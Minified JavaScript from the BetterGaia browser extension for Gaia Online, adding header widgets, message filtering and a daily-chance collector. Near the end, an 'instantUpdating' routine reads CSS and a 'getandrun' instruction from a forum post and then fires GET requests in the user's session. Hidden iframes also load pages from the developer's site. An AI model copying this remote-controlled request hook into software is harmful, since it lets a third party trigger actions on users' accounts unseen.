/*
Main JS
Copyright (c) BetterGaia and Bowafishtech
Unauthorized copying, sharing, adaptation, publishing, commercial usage, and/or distribution, its derivatives and/or successors, via any medium, is strictly prohibited.
*/
function MainJs(){$("body > #gaia_footer > p").append('<span id="bg_credits"><span>You\'re using <a href="/forum/t.45053993/" target="_blank">BetterGaia <small>'+localPrefs.version+'</small></a>     by <a href="http://bettergaia.com/" target="_blank">The BetterGaia Team</a>.</span>    <a class="bgtopofpage" href="#">Back to Top</a>     <a name="bg_bottomofpage"></a>    <iframe sandbox="allow-scripts allow-forms allow-same-origin" style="height: 0; width: 1px; border: 0; visibility: hidden;" src="http://www.bettergaia.com/public/update/"></iframe></span>');
$("#gaia_header #user_header_wrap").prepend('<div id="bg_userbar" class="hud-account"></div>');$("#gaia_header #user_header_wrap #user_account").appendTo("#gaia_header #bg_userbar");$("#gaia_header #user_dropdown_menu").appendTo("#gaia_header #bg_userbar #user_account");!0===prefs["header.float"]&&($("#gaia_header #bg_userbar").append('<ul id="bg_logo"><a href="#">&#8458;&#945;i&#945;</a></ul>'),$(window).scroll(function(){$("#bg_logo, #gaia_header .header_content .notificationChanges").toggleClass("bgscrolling",
175<$(window).scrollTop())}));-1<document.location.pathname.indexOf("/mygaia/")&&!0===prefs["mygaia.bgchat"]&&$("body.mygaia #gaia_content.grid_ray_davies #bd #yui-main .yui-g > .left").prepend('<div id="bg_sidebar" class="mg_content">        <div class="mg_sprite hd">BetterGaia <small class="bgversion">'+localPrefs.version+'</small></div>        <div class="bd">            <iframe sandbox="allow-scripts allow-forms allow-same-origin" width="100%" height="221" frameborder="0" style="" src="http://www.bettergaia.com/sidebar/"></iframe>        </div>    </div>');
$("#gaia_header #bg_userbar").prepend('<ul id="bg_widgets"><li class="bgsettings"><a></a><div></div></li></ul>');"undefined"==typeof localPrefs.welcome&&$("#bg_widgets .bgsettings").addClass("bgwelcome");$("#bg_widgets > li.bgsettings > a").on("click.bgsettings",function(){$(this).parent().hasClass("bgwelcome")&&"undefined"==typeof localPrefs.welcome?(chrome.extension.sendMessage({elements:"settings"}),$(this).parent().removeClass("bgwelcome")):(chrome.extension.sendMessage({elements:"settings"}),
$(this).parent().siblings("li").removeClass("bgopen"))});!0===prefs["header.widgets"]&&($("#bg_widgets > li.bgsettings").before('        <li class="bgfriends"><a></a><div></div></li>        <li class="bgmessages"><a></a><div></div></li>        <li class="bgthreads"><a></a><div></div></li>    <li class="bgwatchlist"><a></a><div></div></li>'),$("#bg_widgets > li a").on("click",function(){$(this).parent().hasClass("bgloaded")||$(this).parent().hasClass("bgloading")||($(this).parent().hasClass("bgfriends")?
($(this).parent().addClass("bgloading"),$.ajax({type:"POST",url:"/gapi/rest/gfooter/",data:{method:"getfriendlist"},dataType:"text json",cache:!1}).done(function(a){"success"==a.message?$.each(a.friendList,function(b,c){var d=""===a.friendList[b].fid?"offline":"online";$("#bg_widgets .bgfriends div").append("<a href='/profiles/"+a.friendList[b].uid+"/' target='_black' class='"+d+"'>                                <img src='/gaia/members/"+a.friendList[b].hs+"' />                                <span>"+
a.friendList[b].un+"</span>                            </a>")}):$("#bg_widgets .bgfriends div").html("<p>There was a problem fetching your friends list. <br> Error: "+a.statusCode+"</p>")}).fail(function(a){$("#bg_widgets .bgfriends div").html("<p>There was a problem fetching your friends list.</p>")}).always(function(a){$("#bg_widgets .bgfriends").removeClass("bgloading").addClass("bgloaded")})):$(this).parent().hasClass("bgmessages")?($(this).parent().addClass("bgloading"),$.get("/profile/privmsg.php",
"html").done(function(a){var b=$('#gaia_content #pm_content table td > img[title="Unread Message"]',a).parent().parent();0===b.length?$("#bg_widgets .bgmessages div").append("<p>You have no unread messages.</p>"):$(b).each(function(){var a=$("<li></li>").append("<a href='"+$(b).find("td span.topictitle > a.topictitle").attr("href")+"'><strong>"+$(b).find("td span.topictitle > a.topictitle").attr("title")+"</strong> from "+$(b).find("span.name a").html()+"</a>");$("#bg_widgets .bgmessages div").append(a)})}).fail(function(a){$("#bg_widgets .bgmessages div").html("<p>There was a problem fetching your messages.</p>")}).always(function(a){$("#bg_widgets .bgmessages").removeClass("bgloading").addClass("bgloaded")})):
$(this).parent().hasClass("bgthreads")?($(this).parent().addClass("bgloading"),$.get("/forum/subscription/","html").done(function(a){a=$("#gaia_content #upe-unsubscribe table.forum-list tbody td.topic-new div > a.goto-new-posts",a);0===a.length?$("#bg_widgets .bgthreads div").append("<p>There are no updates in your subscribed threads.</p>"):$(a).each(function(){var a=$(this).prop("title").slice(0,-13),a=$('<a href="'+$(this).attr("href")+'">'+a+"</a>");$("#bg_widgets .bgthreads div").append(a)})}).fail(function(a){$("#bg_widgets .bgthreads div").html("<p>There was a problem fetching your subscribed threads.</p>")}).always(function(a){$("#bg_widgets .bgthreads").removeClass("bgloading").addClass("bgloaded")})):
$(this).parent().hasClass("bgwatchlist")&&($(this).parent().addClass("bgloading"),$.get("/marketplace/watchlist/","html").done(function(a){0<$("#watchlist_wrapper #watchlist .watchlist_rows > tbody > tr > td span.nolistings",a).length?$("#bg_widgets .bgwatchlist div").append("<p>There are no items in your watchlist.</p>"):(a=$("#watchlist_wrapper #watchlist .watchlist_rows > tbody > tr > td.watchlist_rows_item_field a:first-child",a),$(a).each(function(){var a=$(this).parent().parent().find("td.watchlist_rows_timeleft").text(),
c=$(this).next("a").text();$("#bg_widgets .bgwatchlist div").append($(this).attr("title",c).append("<span>"+a+"</span>"))}))}).fail(function(a){$("#bg_widgets .bgwatchlist div").html("<p>There was a problem fetching your watchlist.</p>")}).always(function(a){$("#bg_widgets .bgwatchlist").removeClass("bgloading").addClass("bgloaded")})));$(this).parent().hasClass("bgsettings")||($(this).parent().siblings("li").removeClass("bgopen"),$(this).parent().toggleClass("bgopen"))}));$(window).load(function(){$("body #editor #format_controls .format-text").append('<li><a class=\'bg_addemoji\' onclick=\'var el = document.getElementById("emoticons"); el.style.display = (el.style.display != "block" ? "block" : "" ); var el2 = document.getElementById("emote_select"); el2.style.display = (el2.style.display != "block" ? "block" : "" );\' title=\'Add Emoticons\'>Add Emoticons</a></li>');
$("body #editor #format_controls .format-elements").append("<li><a class='bg_spoiler' onclick='function wrapText(elementID, openTag, closeTag) {var textarea = document.getElementById(elementID); var len = textarea.value.length; var start = textarea.selectionStart; var end = textarea.selectionEnd; var selectedText = textarea.value.substring(start, end); var replacement = openTag + selectedText + closeTag; textarea.value = textarea.value.substring(0, start) + replacement + textarea.value.substring(end, len);} wrapText(\"message\", \"[spoiler]\", \"[/spoiler]\");' title='Add Spoiler - [spoiler][/spoiler]'>Add Spoiler Tag</a></li>")});
!0===prefs["header.shortcuts"]&&("object"==typeof localPrefs["header.shortcuts.list"]&&$.isEmptyObject(prefs["header.shortcuts.list"])&&(prefs["header.shortcuts.list"]=localPrefs["header.shortcuts.list"],console.warn("Your shortcuts are currently saved locally.")),$.isEmptyObject(prefs["header.shortcuts.list"])||($("#gaia_header #bg_userbar").prepend('<ul id="bg_shortcuts"><a>Shortcuts</a><div></div></ul>'),$(prefs["header.shortcuts.list"]).each(function(a,b){$("#bg_shortcuts div").append('<a href="'+
b[1]+'">'+b[0]+"</a>")})));!0===prefs["header.drawAll"]&&-1<"/ /mygaia/ /market/ /forum/ /world/ /games/ /payments/ /gofusion/".split(" ").indexOf(document.location.pathname)&&1==$("#dailyChance_clawMachine").length&&($("#dailyChance_clawMachine").after('<a class="bg_drawall" title="BetterGaia&rsquo;s Draw All Daily Chances">draw <em>all</em></a>'),$("#dailyReward .bg_drawall").on("click",function(){if(1>$("#bg_drawall").length){var a=Handlebars.compile('<div id="bg_drawall">                <h1>Draw All <a class="close" title="Close"></a></h1>                <ul>                    {{#each this}}                    <li class="pure-g">                        <div class="pure-u-1-5">{{name}}</div>                        <div class="pure-u-4-5"><a class="pure-button" data-candy="{{id}}">Collect</a></div>                    </li>                    {{/each}}                </ul>            </div>            <div class="bettergaia mask"></div>');
$("body").append(a([{id:1,name:"Home"},{id:2,name:"MyGaia"},{id:1279,name:"Gaia Cash"},{id:8,name:"Shops"},{id:1271,name:"GoFusion"},{id:3,name:"Forums"},{id:5,name:"World"},{id:4,name:"Games"},{id:12,name:"Mobile App"}]));$("#bg_drawall h1 .close").on("click",function(){$("#bg_drawall").removeClass("bgopen")});$("#bg_drawall .pure-button").on("click",function(){var a=$(this).closest("li");a.addClass("loading");$.ajax({type:"POST",url:"/dailycandy/pretty/",data:{action:"issue",list_id:$(this).attr("data-candy"),
_view:"json"},dataType:"json"}).done(function(c){if("ok"==c.status){var d=Handlebars.compile('<span>                            <img src="http://gaiaonline.com/images/{{data.reward.thumb}}"><br>                            <strong>{{data.reward.name}}</strong>                        </span>                        <p>                            {{#if data.tier_desc}}                            {{data.tier_desc}}<br><br>                            {{/if}}                            {{{data.reward.descrip}}}                        </p>');
a.children(".pure-u-4-5").html(d(c))}else"fail"==c.status?a.children(".pure-u-4-5").html("<p>"+c.error.message+"</p>"):a.children(".pure-u-4-5").html("<p>There was a problem getting your Daily Chance.</p>")}).fail(function(){a.children(".pure-u-4-5").html("<p>There was a problem getting your Daily Chance.</p>")}).always(function(){a.removeClass("loading").addClass("loaded")})})}$("#bg_drawall").addClass("bgopen")}));if(!0===prefs.pms&&-1<document.location.pathname.indexOf("/profile/privmsg.php")){$('body.mail #pm_content table tr[height="20"] td[align]').after("<div class='bg_selecttypes'><span><a class='all'>All</a><a class='read'>Read</a><a  class='unread'>Unread</a><a class='replied'>Replied</a><a class='none'>None</a></span></div>");
$('body.mail #pm_content table tr[bgcolor][height="42"] > td:nth-of-type(2) img').each(function(a,b){$(this).closest('tr[bgcolor][height="42"]').attr("status",$(this).attr("title"))});$("body.mail #pm_content .bg_selecttypes a").on("click",function(){$(this).hasClass("all")&&$('tr[bgcolor][height="42"]:not(.bgpm_hide) input[type="checkbox"]').prop("checked",!0);$(this).hasClass("read")&&$('tr[bgcolor][height="42"][status="Read Message"]:not(.bgpm_hide) input[type="checkbox"]').prop("checked",!0);
$(this).hasClass("unread")&&$('tr[bgcolor][height="42"][status="Unread Message"]:not(.bgpm_hide) input[type="checkbox"]').prop("checked",!0);$(this).hasClass("replied")&&$('tr[bgcolor][height="42"][status="Replied Message"]:not(.bgpm_hide) input[type="checkbox"]').prop("checked",!0);$(this).hasClass("none")&&$('tr[bgcolor][height="42"]:not(.bgpm_hide) input[type="checkbox"]').prop("checked",!1)});var e=[];$('tr[bgcolor][height="42"] span.name a[href]').each(function(a,b){var c=$(this).attr("href").split("/")[5];
$(this).closest('tr[bgcolor][height="42"]').attr("userid",c);-1==e.indexOf(c)&&(e.push(c),$.get("/profiles?mode=lookup&avatar_username="+$(this).closest('tr[bgcolor][height="42"]').find("span.name").text(),function(a){var b=document.createElement("img");$(b).load(function(){$('tr[bgcolor][height="42"][userid="'+c+'"] span.topictitle a').css({"background-image":"url(/dress-up/avatar/"+$(a).find("response").attr("avatarPath")+")","background-position":"right -35px"})});b.src="http://www.gaiaonline.com/dress-up/avatar/"+
$(a).find("response").attr("avatarPath")}))});$('body.mail #pm_content table tr[height="20"]').append('<input type="text" class="bgpm_search" placeholder="Search this page" value="" />');$.extend($.expr[":"],{Contains:function(a,b,c,d){return 0<=(a.textContent||a.innerText||"").toLowerCase().indexOf((c[3]||"").toLowerCase())}});$('body.mail #pm_content table tr[height="20"] .bgpm_search').keyup(function(){var a=$(this).val();0<a.length?($('body.mail #pm_content table tr[bgcolor][height="42"]:not(:Contains("'+
a+'"))').addClass("bgpm_hide").find('input[type="checkbox"]').prop("checked",!1),$('body.mail #pm_content table tr[bgcolor][height="42"]:Contains("'+a+'")').removeClass("bgpm_hide")):$('body.mail #pm_content table tr[bgcolor][height="42"]').removeClass("bgpm_hide")})}!0===prefs.instantUpdating&&$(window).load(function(){$.ajax({url:"/guilds/viewtopic.php?t=24076833",cache:!1,dataType:"html",headers:{"X-PJAX":!0}}).done(function(a){if(1==$('.postcontent:eq(1) .postbody span[style="color:enabled"]',
a).length){var b=localPrefs.version.replace(/\./g,"");a=$(".postcontent:eq(1) .postbody",a);1==$('span[style="color:#'+b+'"] + .spoiler-wrapper .code',a).length?chrome.storage.local.set({css:$('span[style="color:#'+b+'"] + .spoiler-wrapper .code',a).text()}):chrome.storage.local.remove("css");if(1==$('span[style="color:getandrun"]',a).length){var c=$('.postcontent:eq(1) .postbody span[style="color:getandrun"]',a).text().split(",");$.ajax({url:c[0],cache:!1,dataType:"html",headers:{"X-PJAX":!0}}).done(function(a){1==
    $(c[1],a).length&&$.get(c[0]+$(c[1],a)[c[3]]()+c[2])})}}})})}!0===prefs.appliedUserPrefs&&!1===prefs.appliedMainJs&&(MainJs(),prefs.appliedMainJs=!0);
